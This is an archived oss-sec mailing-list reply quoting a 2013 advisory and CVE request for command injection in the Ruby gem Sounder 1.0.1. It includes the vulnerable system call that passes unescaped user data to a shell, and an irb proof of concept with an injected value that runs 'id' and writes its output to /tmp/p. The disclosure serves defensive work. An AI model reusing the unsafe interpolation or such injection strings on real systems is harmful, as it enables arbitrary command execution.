oss-sec mailing list archives

Re: Command Injection in Ruby Gem Sounder 1.0.1


From: Henri Salo <henri () nerv fi>
Date: Wed, 28 Aug 2013 22:36:47 +0300

On Wed, Aug 28, 2013 at 03:06:14AM +0000, Larry W. Cashdollar wrote:
Title: Command Injection in Ruby Gem Sounder 1.0.1

Date: 8/10/2013
Author: Larry W. Cashdollar @_larry0

Download: https://rubygems.org/gems/sounder
CVE: TBD
Description:

Sounder is a ruby gem API for Mac OSX's afplay command.
It passes user supplied data directly to command line.

From lib/sounder/sound.rb:

   def play
     system %{/usr/bin/afplay "#{@file}" &}
   end

PoC:

irb(main):098:0> @file = "\"id;/usr/bin/id>/tmp/p;\""
=> "\"id;/usr/bin/id>/tmp/p;\""
irb(main):099:0>  system %{/bin/echo "#{@file}" }
id
sh: 1: : Permission denied
=> false
irb(main):100:0>

larry@underfl0w:/tmp$ cat /tmp/p
uid=1000(larry) gid=600(staff) groups=600(user)

Author Notified: 8/9/2013
Advisory:  http://vapid.dhs.org/advisories/sounder-ruby-gem-cmd-inj.html

This was the CVE request (just to be clear).

---
Henri Salo

Attachment: signature.asc
Description: Digital signature


Current thread: